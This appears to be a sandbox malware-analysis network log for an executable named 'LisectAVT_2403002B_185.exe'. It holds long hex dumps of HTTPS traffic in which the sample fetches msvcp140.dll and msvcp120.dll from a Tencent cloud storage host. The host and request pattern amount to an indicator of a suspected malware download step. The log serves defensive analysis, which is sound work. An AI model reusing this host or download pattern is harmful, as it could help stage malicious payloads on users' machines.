                                                                2024-07-25 15:03:14 UTC8184INData Raw: 8b ec 33 c9 39 4d 08 76 16 a1 00 13 01 10 80 38 00 74 10 40 41 a3 00 13 01 10 3b 4d 08 72 ef b0 01 5d c3 32 c0 5d c3 33 c0 39 01 0f 94 c0 c3 33 c0 80 79 04 01 0f 9e c0 c3 57 8b 39 85 ff 75 04 33 c0 5f c3 8b 07 56 8b 30 8b ce ff 15 bc 20 01 10 8b cf ff d6 5e 5f c3 cc cc cc cc cc cc cc cc 8b 41 08 c3 cc cc cc cc cc cc cc cc cc cc cc cc 33 c0 40 c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 49 04 85 c9 0f 85 ae ff ff ff 33 c0 c3 cc cc 55 8b ec 51 8b 41 0c 89 4d fc 85 c0 79 39 53 56 57 8b 79 08 8b 07 8b 30 8b ce ff 15 bc 20 01 10 8b cf ff d6 8b d8 8b 45 fc 8b 78 04 8b 07 8b 30 8b ce ff 15 bc 20 01 10 8b cf ff d6 8b 4d fc 03 c3 5f 5e 5b 89 41 0c c9 c3 55 8b ec 8b 45 08 83 f8 03 77 0a 6b c0 0c 05 b0 23 00 10 5d c3 b8 d4 23 00 10 5d c3 55 8b ec a1 04 13 01 10 83 ec
                                                                Data Ascii: 39Mv8t@A;Mr]2]393yW9u3_V0 ^_A3@I3UQAMy9SVWy0 Ex0 M_^[AUEwk#]#]U
                                                                2024-07-25 15:03:14 UTC16368INData Raw: 5f 69 6e 66 6f 40 40 00 ca 23 01 00 9a 25 01 00 86 25 01 00 68 25 01 00 4c 25 01 00 32 25 01 00 1c 25 01 00 06 25 01 00 ec 24 01 00 d0 24 01 00 bc 24 01 00 a6 24 01 00 94 24 01 00 82 24 01 00 74 24 01 00 6a 24 01 00 40 23 01 00 4c 23 01 00 5c 23 01 00 6c 23 01 00 88 23 01 00 a0 23 01 00 b2 23 01 00 4e 24 01 00 e2 23 01 00 fa 23 01 00 0a 24 01 00 1a 24 01 00 42 24 01 00 5c 24 01 00 00 00 00 00 88 22 01 00 00 00 00 00 3e 22 01 00 28 22 01 00 20 22 01 00 00 00 00 00 14 22 01 00 0c 22 01 00 00 00 00 00 52 22 01 00 6c 22 01 00 00 00 00 00 32 22 01 00 90 22 01 00 48 22 01 00 00 00 00 00 a0 3f 00 10 00 00 00 00 e4 21 01 00 00 00 00 00 00 00 00 00 9a 22 01 00 94 20 01 00 d4 21 01 00 00 00 00 00 00 00 00 00 bc 22 01 00 84 20 01 00 fc 21 01 00 00 00 00 00 00 00 00
                                                                Data Ascii: _info@@#%%h%L%2%%%$$$$$$t$j$@#L#\#l####N$##$$B$\$">"(" """R"l"2""H"?!" !" !
                                                                2024-07-25 15:03:14 UTC8184INData Raw: 6f 73 6f 66 74 20 43 6f 72 70 6f 72 61 74 69 6f 6e 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 a2 c8 b2 65 60 7b 0f 97 82 fd b0 97 ba c2 86 31 89 83 d2 34 db f4 12 22 e5 ac a6 7e 47 ce 3d 10 0e 7a ac a0 6a 7e 1d fd c7 3b 61 b6 34 46 84 a2 3d f8 a0 a7 71 6f d5 5f 68 27 36 bd 61 30 aa 51 d9 3d 79 4d f9 24 45 5a 06 92 eb 1c 34 11 c6 20 72 6f 39 bf de f0 c8 49 d5 09 8b 46 70 14 25 21 57 26 50 33 60 c3 41 17 bd dc 8a c7 01 3f 02 d4 8e dd ab 5d 47 31 0b 98 91 1c b3 0a 99 56 18 e7 f2 0b 85 8b a7 d8 06 ce 2e 69 83 bf 74 4b a2 2f d6 ab 35 69 72 1f ff d1 bb b5 91 98 96 5a 50 b4 07 04 5e f6 62 83 df b6 e3 c7 a8 90 57 c1 df 17 8c cd f3 5d 48 5f d7 55 f3 cf 9d 4f e5 2e 82 a8 5c 8e 19 49 29 2b 0d 0c 82 6c 84 8e d0
                                                                Data Ascii: osoft Corporation0"0*H0e`{14"~G=zj~;a4F=qo_h'6a0Q=yM$EZ4 ro9IFp%!W&P3`A?]G1V.itK/5irZP^bW]H_UO.\I)+l


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                3192.168.2.74971482.156.94.454436932C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-07-25 15:03:16 UTC131OUTGET /msvcp140.dll HTTP/1.1
                                                                User-Agent: Mozilla/5.0
                                                                Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                                Cache-Control: no-cache
                                                                2024-07-25 15:03:17 UTC473INHTTP/1.1 200 OK
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 446840
                                                                Connection: close
                                                                Accept-Ranges: bytes
                                                                Content-Disposition: attachment
                                                                Date: Thu, 25 Jul 2024 15:03:17 GMT
                                                                ETag: "c766ca0482dfe588576074b9ed467e38"
                                                                Last-Modified: Wed, 20 Mar 2024 20:21:50 GMT
                                                                Server: tencent-cos
                                                                x-cos-force-download: true
                                                                x-cos-hash-crc64ecma: 10292142785671919093
                                                                x-cos-request-id: NjZhMjY5MzRfMWQ3NTc3MGJfZWFkZl8xYjQ4NjZk
                                                                x-cos-server-side-encryption: AES256
                                                                2024-07-25 15:03:17 UTC7731INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 8d 4f bd 24 c9 2e d3 77 c9 2e d3 77 c9 2e d3 77 1a 5c d2 76 cb 2e d3 77 c0 56 40 77 df 2e d3 77 cf af d2 76 ca 2e d3 77 c9 2e d2 77 08 2e d3 77 cf af d7 76 c2 2e d3 77 cf af d0 76 c0 2e d3 77 cf af d6 76 44 2e d3 77 cf af d3 76 c8 2e d3 77 cf af 2c 77 c8 2e d3 77 cf af d1 76 c8 2e d3 77 52 69 63 68 c9 2e d3 77 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$O$.w.w.w\v.wV@w.wv.w.w.wv.wv.wvD.wv.w,w.wv.wRich.w
                                                                2024-07-25 15:03:17 UTC8184INData Raw: 10 14 5c 00 10 f0 bc 00 10 40 e0 00 10 c0 df 00 10 70 ce 00 10 60 dc 00 10 90 dc 00 10 69 6f 73 74 72 65 61 6d 00 00 00 00 69 6f 73 74 72 65 61 6d 20 73 74 72 65 61 6d 20 65 72 72 6f 72 00 00 00 60 5c 00 10 40 bd 00 10 b0 96 00 10 62 61 64 20 63 61 73 74 00 00 00 00 ac 5c 00 10 a0 b9 00 10 00 ca 03 10 00 ca 03 10 62 61 64 20 6c 6f 63 61 6c 65 20 6e 61 6d 65 00 00 00 00 00 3a 53 75 6e 3a 53 75 6e 64 61 79 3a 4d 6f 6e 3a 4d 6f 6e 64 61 79 3a 54 75 65 3a 54 75 65 73 64 61 79 3a 57 65 64 3a 57 65 64 6e 65 73 64 61 79 3a 54 68 75 3a 54 68 75 72 73 64 61 79 3a 46 72 69 3a 46 72 69 64 61 79 3a 53 61 74 3a 53 61 74 75 72 64 61 79 00 00 00 3a 4a 61 6e 3a 4a 61 6e 75 61 72 79 3a 46 65 62 3a 46 65 62 72 75 61 72 79 3a 4d 61 72 3a 4d 61 72 63 68 3a 41 70 72 3a 41 70
                                                                Data Ascii: \@p`iostreamiostream stream error`\@bad cast\bad locale name:Sun:Sunday:Mon:Monday:Tue:Tuesday:Wed:Wednesday:Thu:Thursday:Fri:Friday:Sat:Saturday:Jan:January:Feb:February:Mar:March:Apr:Ap
                                                                2024-07-25 15:03:17 UTC8184INData Raw: 00 00 00 16 40 1c 70 00 10 b0 74 02 10 80 c6 00 10 80 be 00 10 f0 90 02 10 80 a2 02 10 d0 9d 02 10 70 70 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 f0 2e 02 10 30 91 02 10 80 c7 00 10 c8 70 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 00 92 02 10 50 91 02 10 1c 71 00 10 20 b7 01 10 80 c6 00 10 80 be 00 10 10 9e 02 10 50 9f 02 10 18 73 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00 02 10 00 2f 02 10 a0 2e 02 10 70 71 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00 02 10 00 2f 02 10 a0 2e 02 10 10 72 00 10 80 74 02 10 80 c6 00 10 80 be 00 10 80 2c 01 10 50 3d 01 10 80 36 01 10 90 2c 01 10 60 3d 01 10 f0 9d 02 10 80 00
                                                                Data Ascii: @ptpp .0p Pq Pst,P=6,`=/.pqt,P=6,`=/.rt,P=6,`=
                                                                2024-07-25 15:03:17 UTC8184INData Raw: 10 38 6a 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 b8 3e 06 10 03 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 14 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 10 3f 06 10 68 6a 00 10 00 00 00 00 01 00 00 00 06 00 00 00 78 6a 00 10 94 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 10 3f 06 10 05 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 68 6a 00 10 38 3f 06 10 04 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6a 00 10 00 00 00 00 01 00 00 00 05 00 00 00 dc 6a 00 10 b0 6a 00 10 e8 67 00 10 28 5d 00 10 d8 5c 00 10 44 5d 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 3f 06 10 08 6b 00 10 00 00 00 00 01 00 00 00 06 00 00 00 18 6b 00 10 34 6b 00 10 b0 6a 00 10 e8 67
                                                                Data Ascii: 8j(]\D]>@j?hjxjjjg(]\D]?@hj8?@jjjg(]\D]X?kk4kjg
                                                                2024-07-25 15:03:17 UTC8184INData Raw: 08 e8 2f 01 00 00 83 65 fc 00 c7 06 80 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7 01 44 29 00 10 89 41 08 c7 41 04 88 29 00 10 89 45 fc c7 01 80 29 00 10 83 4d fc ff 8b c1 8b 4d f4 64 89 0d 00 00 00 00 59 c9 c3 cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 6a ff 68 43 cb 03 10 64 a1 00 00 00 00 50 51 56 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b f1 89 75 f0 ff 75 08 e8 7f 00 00 00 83 65 fc 00 c7 06 64 29 00 10 83 4d fc ff 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5e c9 c2 04 00 55 8b ec 6a ff 68 6d cb 03 10 64 a1 00 00 00 00 50 51 a1 80 32 06 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 4d f0 33 c0 c7
                                                                Data Ascii: /e)MMdY^UjhmdPQ23PEdM3D)AA)E)MMdYUjhCdPQV23PEduued)MMdY^UjhmdPQ23PEdM3
                                                                2024-07-25 15:03:17 UTC16384INData Raw: 31 ce 03 10 e8 65 11 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 d8 2e 00 10 e8 42 02 00 00 8d 45 bc 8b ce 50 e8 a7 1d 00 00 8d 4d bc e8 7f 08 00 00 8b c6 e8 06 11 03 00 c2 04 00 cc cc cc cc cc 55 8b ec 51 8b 45 0c 56 ff 75 08 8b f1 89 75 fc 89 46 04 c7 06 98 2e 00 10 e8 72 1d 00 00 8b c6 5e c9 c2 08 00 cc cc cc cc cc cc cc cc cc cc cc 6a 38 b8 31 ce 03 10 e8 e5 10 03 00 8b f1 89 75 f0 8b 45 08 89 46 04 83 65 fc 00 8d 4d bc 68 60 2d 00 10 c7 06 98 2e 00 10 e8 c2 01 00 00 8d 45 bc 8b ce 50 e8 27 1d 00 00 8d 4d bc e8 ff 07 00 00 8b c6 e8 86 10 03 00 c2 04 00 cc cc cc cc cc 56 8b f1 56 e8 c7 5a 00 00 59 8b c6 5e c3 cc cc c7 01 90 2a 00 10 8b c1 c2 04 00 cc cc cc cc cc c7 01 90 2a 00 10 8b c1 c3 a1 18 46 06 10 c7 05 38 49
                                                                Data Ascii: 1euEFeMh`-.BEPMUQEVuuF.r^j81uEFeMh`-.EP'MVVZY^**F8I
                                                                2024-07-25 15:03:17 UTC8168INData Raw: ce ff 15 30 63 06 10 8b cf ff d6 5f 5e 5d c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc 6a 30 b8 6a d1 03 10 e8 78 d1 02 00 8b d9 8b 43 1c 8b 08 85 c9 74 23 8b 53 2c 8b 32 8d 04 0e 3b c8 73 17 8d 46 ff 89 02 8b 4b 1c 8b 11 8d 42 01 89 01 0f b6 02 e9 51 01 00 00 83 7b 4c 00 75 08 83 c8 ff e9 43 01 00 00 8b cb e8 11 df ff ff 8b 4b 4c 33 d2 39 53 38 75 19 51 8d 45 d6 50 e8 a6 b6 ff ff 59 59 84 c0 74 d7 0f b6 45 d6 e9 19 01 00 00 33 c0 8d 7d d8 ab ab ab ab 89 55 e8 c7 45 ec 0f 00 00 00 88 55 d8 51 89 55 fc ff 15 98 62 06 10 83 cf ff e9 90 00 00 00 50 8d 4d d8 e8 54 f8 ff ff 83 7d ec 0f 8d 4d d8 8b 53 38 89 55 c8 76 03 8b 4d d8 8b 45 e8 03 c1 83 7d ec 0f 89 45 cc 8d 4d d8 76 03 8b 4d d8 8b 02 8b 70 18 8d 45 c4 50 8d 45 d8 50 8d 45 d7 50 8d 45 d0 50 ff 75 cc 8d
                                                                Data Ascii: 0c_^]j0jxCt#S,2;sFKBQ{LuCKL39S8uQEPYYtE3}UEUQUbPMT}MS8UvME}EMvMpEPEPEPEPu
                                                                2024-07-25 15:03:17 UTC8184INData Raw: 0f 8d 75 c0 76 03 8b 75 c0 8a 06 3c 7f 74 32 8b 7d ac 84 c0 7e 28 0f be c8 8b c7 2b c3 3b c8 73 1d ff 75 98 2b f9 8d 4d d8 6a 01 57 e8 6e 34 00 00 80 7e 01 00 7e 01 46 8a 06 3c 7f 75 d4 8b 7d bc 83 7f 24 00 8b 45 e8 89 45 a0 7c 13 7f 06 83 7f 20 00 76 0b 8b 77 20 3b f0 76 04 2b f0 eb 02 33 f6 8b 47 14 25 c0 01 00 00 83 f8 40 0f 84 83 00 00 00 3d 00 01 00 00 74 38 56 ff 75 18 8d 45 a4 ff 75 10 ff 75 0c 50 ff 75 b8 e8 e5 20 00 00 83 c4 18 33 f6 83 7d ec 0f 8b 08 8b 50 04 8d 45 d8 89 4d 0c 89 55 10 76 03 8b 45 d8 53 50 52 51 eb 58 83 7d ec 0f 8d 45 d8 76 03 8b 45 d8 53 50 ff 75 10 8d 45 a4 ff 75 0c 50 ff 75 b8 e8 63 20 00 00 56 ff 75 18 8b 08 8b 40 04 50 89 45 10 8d 45 a4 51 50 ff 75 b8 89 4d 0c e8 86 20 00 00 83 c4 30 33 f6 eb 23 83 7d ec 0f 8d 45 d8 76 03
                                                                Data Ascii: uvu<t2}~(+;su+MjWn4~~F<u}$EE| vw ;v+3G%@=t8VuEuuPu 3}PEMUvESPRQX}EvESPuEuPuc Vu@PEEQPuM 03#}Ev
                                                                2024-07-25 15:03:17 UTC8184INData Raw: 33 c0 eb 07 53 e8 24 f4 ff ff 59 ff 75 f0 50 56 e8 98 fc ff ff 83 c4 0c b9 90 49 06 10 e8 bb 8b ff ff 85 db 75 4a 6a 18 89 45 f0 e8 65 93 02 00 8b f0 59 89 75 e8 c7 45 fc 07 00 00 00 85 f6 74 1a 21 5e 04 53 ff 75 08 8b ce c6 45 fc 08 c7 06 c8 32 00 10 e8 ba f8 ff ff eb 02 33 f6 ff 75 f0 83 4d fc ff 56 57 e8 42 fc ff ff 83 c4 0c eb 13 53 8b f0 e8 4b f4 ff ff 56 50 57 e8 2d fc ff ff 83 c4 10 83 7d ec 00 74 4a b9 c0 46 06 10 e8 4a 8b ff ff 8b f0 85 db 75 29 6a 08 e8 f5 92 02 00 89 45 e8 59 85 c0 74 0b 21 58 04 c7 00 1c 30 00 10 eb 02 33 c0 56 50 57 e8 f0 fb ff ff 83 c4 0c eb 11 53 e8 39 78 ff ff 56 50 57 e8 dd fb ff ff 83 c4 10 8b 75 08 53 57 ff 75 0c 56 e8 0c 5d 01 00 53 57 ff 75 0c 56 e8 b1 c2 00 00 53 8b 5d 0c 57 53 56 e8 c5 bd 00 00 09 5f 10 83 c4 30 8b
                                                                Data Ascii: 3S$YuPVIuJjEeYuEt!^SuE23uMVWBSKVPW-}tJFJu)jEYt!X03VPWS9xVPWuSWuV]SWuVS]WSV_0
                                                                2024-07-25 15:03:17 UTC8184INData Raw: 10 50 ff 36 e8 93 ff ff ff 5e c9 c2 08 00 ff 25 10 61 06 10 55 8b ec 6a ff ff 75 08 e8 0e 00 00 00 84 c0 75 06 ff 15 50 62 06 10 5d c2 04 00 55 8b ec 8b 45 08 6a 00 ff 75 0c 83 c0 04 50 8d 41 04 50 ff 15 00 61 06 10 85 c0 0f 95 c0 5d c2 08 00 cc cc cc cc 55 8b ec 8b 45 08 83 c0 04 50 ff 15 04 61 06 10 33 c0 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 7d 08 00 74 07 5d ff 25 cc 61 06 10 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 56 8b 75 08 6a 28 6a 01 83 26 00 ff 15 d0 61 06 10 59 59 85 c0 75 03 40 eb 0b 83 20 00 83 60 04 00 89 06 33 c0 5e 5d c3 cc cc cc cc cc 55 8b ec 8b 45 08 83 c0 04 50 ff 15 08 61 06 10 33 c0 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 8b ec 83 ec 18 a1 80 32 06 10 33 c5 89 45 fc 8b 45 08 53 8b 5d 10 56 8b 75
                                                                Data Ascii: P6^%aUjuuPb]UEjuPAPa]UEPa3]U}t]%a]UVuj(j&aYYu@ `3^]UEPa3]U23EES]Vu


                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                4192.168.2.75353882.156.94.454436932C:\Users\user\Desktop\LisectAVT_2403002B_185.exe
                                                                TimestampBytes transferredDirectionData
                                                                2024-07-25 15:03:20 UTC131OUTGET /msvcp120.dll HTTP/1.1
                                                                User-Agent: Mozilla/5.0
                                                                Host: kdll-1323571269.cos.ap-beijing.myqcloud.com
                                                                Cache-Control: no-cache
                                                                2024-07-25 15:03:20 UTC472INHTTP/1.1 200 OK
                                                                Content-Type: application/x-msdownload
                                                                Content-Length: 455160
                                                                Connection: close
                                                                Accept-Ranges: bytes
                                                                Content-Disposition: attachment
                                                                Date: Thu, 25 Jul 2024 15:03:20 GMT
                                                                ETag: "50260b0f19aaa7e37c4082fecef8ff41"
                                                                Last-Modified: Wed, 20 Mar 2024 20:21:48 GMT
                                                                Server: tencent-cos
                                                                x-cos-force-download: true
                                                                x-cos-hash-crc64ecma: 9823542669508837271
                                                                x-cos-request-id: NjZhMjY5MzhfYzdhZDE0MGJfOTgzOF8zZTE5OGQ2
                                                                x-cos-server-side-encryption: AES256
                                                                2024-07-25 15:03:20 UTC7732INData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 6f ad d2 1d 2b cc bc 4e 2b cc bc 4e 2b cc bc 4e f6 33 77 4e 29 cc bc 4e 2b cc bd 4e f0 cc bc 4e 6d 9d 61 4e 28 cc bc 4e 6d 9d 63 4e 23 cc bc 4e 6d 9d 5d 4e 18 cc bc 4e 6d 9d 5c 4e 65 cc bc 4e 6d 9d 59 4e 2d cc bc 4e 6d 9d 60 4e 2a cc bc 4e 6d 9d 67 4e 2a cc bc 4e 6d 9d 62 4e 2a cc bc 4e 52 69 63 68 2b cc bc 4e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$o+N+N+N3wN)N+NNmaN(NmcN#Nm]NNm\NeNmYN-Nm`N*NmgN*NmbN*NRich+N
                                                                2024-07-25 15:03:20 UTC8184INData Raw: 73 20 64 65 76 69 63 65 20 6c 69 6e 6b 00 00 00 6f 70 65 72 61 74 69 6f 6e 20 63 61 6e 63 65 6c 65 64 00 00 74 6f 6f 20 6d 61 6e 79 20 66 69 6c 65 73 20 6f 70 65 6e 00 70 65 72 6d 69 73 73 69 6f 6e 5f 64 65 6e 69 65 64 00 00 00 61 64 64 72 65 73 73 5f 69 6e 5f 75 73 65 00 00 61 64 64 72 65 73 73 5f 6e 6f 74 5f 61 76 61 69 6c 61 62 6c 65 00 00 00 61 64 64 72 65 73 73 5f 66 61 6d 69 6c 79 5f 6e 6f 74 5f 73 75 70 70 6f 72 74 65 64 00 00 00 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 61 6c 72 65 61 64 79 5f 69 6e 5f 70 72 6f 67 72 65 73 73 00 00 62 61 64 5f 66 69 6c 65 5f 64 65 73 63 72 69 70 74 6f 72 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 61 62 6f 72 74 65 64 00 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 72 65 66 75 73 65 64 00 00 63 6f 6e 6e 65 63 74 69 6f 6e 5f 72 65 73 65
                                                                Data Ascii: s device linkoperation canceledtoo many files openpermission_deniedaddress_in_useaddress_not_availableaddress_family_not_supportedconnection_already_in_progressbad_file_descriptorconnection_abortedconnection_refusedconnection_rese
                                                                2024-07-25 15:03:21 UTC8184INData Raw: 2e ae 6e ee 1e 9e 5e de 3e be 7e fe 01 81 41 c1 21 a1 61 e1 11 91 51 d1 31 b1 71 f1 09 89 49 c9 29 a9 69 e9 19 99 59 d9 39 b9 79 f9 05 85 45 c5 25 a5 65 e5 15 95 55 d5 35 b5 75 f5 0d 8d 4d cd 2d ad 6d ed 1d 9d 5d dd 3d bd 7d fd 03 83 43 c3 23 a3 63 e3 13 93 53 d3 33 b3 73 f3 0b 8b 4b cb 2b ab 6b eb 1b 9b 5b db 3b bb 7b fb 07 87 47 c7 27 a7 67 e7 17 97 57 d7 37 b7 77 f7 0f 8f 4f cf 2f af 6f ef 1f 9f 5f df 3f bf 7f ff 84 7c 00 10 00 b2 03 10 00 b2 03 10 00 b2 03 10 a1 11 01 10 00 b2 03 10 00 b2 03 10 49 6e 64 65 78 20 6f 75 74 20 6f 66 20 72 61 6e 67 65 00 00 49 6e 64 65 78 20 6f 75 74 20 6f 66 20 73 65 67 6d 65 6e 74 73 20 74 61 62 6c 65 20 72 61 6e 67 65 00 00 00 49 6e 64 65 78 20 69 73 20 69 6e 73 69 64 65 20 73 65 67 6d 65 6e 74 20 77 68 69 63 68 20 66
                                                                Data Ascii: .n^>~A!aQ1qI)iY9yE%eU5uM-m]=}C#cS3sK+k[;{G'gW7wO/o_?|Index out of rangeIndex out of segments table rangeIndex is inside segment which f
                                                                2024-07-25 15:03:21 UTC8184INData Raw: 00 00 00 00 00 00 00 00 01 00 00 00 94 6f 00 10 d0 50 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 69 00 10 b8 4d 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 20 6c 00 10 00 00 00 00 e0 00 00 00 00 00 00 00 78 4c 06 10 dc 6a 00 10 00 00 00 00 00 00 00 00 00 00 00 00 00 51 06 10 9c 6e 00 10 70 71 00 10 d8 64 00 10 a0 75 00 10 00 00 00 00 78 5a 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 cc 6c 00 10 58 49 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 a8 70 00 10 00 00 00 00 01 00 00 00 04 00 00 00 ac 71 00 10 30 48 06 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 00 6a 00 10 88 41 06 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 40 68 00
                                                                Data Ascii: oP@iM@ lxLjQnpqduxZ@lXI@pq0H@jA@@h
                                                                2024-07-25 15:03:21 UTC8184INData Raw: 00 ff 15 0c 92 06 10 83 c4 14 89 5d f0 85 f6 74 06 8d 9f f0 00 00 00 8d 55 f0 8b cb e8 c5 46 00 00 8b c7 e8 fc 28 03 00 c2 04 00 6a 04 b8 7d be 03 10 e8 1f 29 03 00 8b f1 89 75 f0 c7 06 9c 3f 00 10 83 65 fc 00 8b c6 99 52 50 6a 03 ff 15 0c 92 06 10 83 4d fc ff 8d 4e 08 83 c4 0c e8 5a 09 00 00 e8 bd 28 03 00 c3 8d 41 08 c3 51 6a 00 83 c1 08 83 ca ff e8 f4 40 00 00 59 59 c3 55 8b ec 83 e4 f8 51 53 56 8b f1 83 ca ff 57 33 ff 57 8d 5e 08 8b cb e8 d5 40 00 00 59 85 c0 74 04 32 c0 eb 71 33 c0 8d 8e 60 01 00 00 33 d2 40 f0 0f b1 11 85 c0 74 e9 8b c6 99 52 50 6a 04 ff 15 0c 92 06 10 83 c4 0c c7 44 24 0c 01 00 00 00 85 db 74 06 8d be f0 00 00 00 8d 54 24 0c 8b cf e8 04 46 00 00 8b 8e 6c 01 00 00 56 68 40 91 00 10 85 c9 74 06 8b 01 ff 10 eb 19 8b 8e 68 01 00 00 85
                                                                Data Ascii: ]tUF(j})u?eRPjMNZ(AQj@YYUQSVW3W^@Yt2q3`3@tRPjD$tT$FlVh@th
                                                                2024-07-25 15:03:21 UTC8184INData Raw: a8 e8 73 0b 00 00 8b c6 e8 33 09 03 00 c2 04 00 6a 04 b8 f4 c3 03 10 e8 42 09 03 00 8b f1 89 75 f0 c7 06 dc 42 00 10 c7 45 fc 01 00 00 00 8d 4e 60 8b 01 c6 46 58 01 ff 50 08 8b 06 8b ce ff 50 18 8d 8e f8 00 00 00 e8 cd f8 ff ff 83 4d fc ff 8b ce e8 9b 00 00 00 e8 d0 08 03 00 c3 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0a 8d 4f 60 8b 01 52 ff 10 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 45 08 56 57 8b f9 33 f6 8b 4d 0c 57 ff 70 04 8b 11 ff 52 10 8b d0 85 d2 74 0b 8d 4f 60 8b 01 52 ff 50 04 eb 03 6a 03 5e 5f 8b c6 5e 5d c2 08 00 55 8b ec 8b 89 08 01 00 00 85 c9 74 1b 8b 11 56 8b 75 08 8d 46 08 50 ff 52 08 8b 06 8b ce 6a 01 ff 50 04 5e 5d c2 04 00 e8 84 8e 00 00 cc 6a 04 b8 2d c4 03 10 e8 60 08 03 00 8b
                                                                Data Ascii: s3jBuBEN`FXPPMUEVW3MWpRtO`Rj^_^]UEVW3MWpRtO`RPj^_^]UtVuFPRjP^]j-`
                                                                2024-07-25 15:03:21 UTC8184INData Raw: 89 7e 58 e8 9c e9 ff ff 89 7e 5c 83 4d fc ff 8b 4d e8 85 c9 74 14 8b 11 8d 45 d8 3b c8 0f 95 c0 0f b6 c0 50 ff 52 10 89 7d e8 85 f6 74 06 8d be e0 00 00 00 89 be 30 01 00 00 e8 09 e9 02 00 c2 08 00 55 8b ec 56 8b f1 e8 c0 00 00 00 f6 45 08 01 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 78 43 00 10 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec f6 45 08 01 56 8b f1 c7 06 d4 3f 00 10 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 55 8b ec 56 8b f1 e8 15 00 00 00 f6 45 08 01 74 08 56 ff 15 2c 93 06 10 59 8b c6 5e 5d c2 04 00 6a 04 b8 80 c8 03 10 e8 96 e8 02 00 8b f1 89 75 f0 c7 06 38 42 00 10 83 65 fc 00 eb 0d 6a 00 8b ce e8 87 4a 00 00 84 c0 74 0b 8b ce e8 d8 4a 00 00 84 c0 74 e8 8b ce e8 f0 4a 00
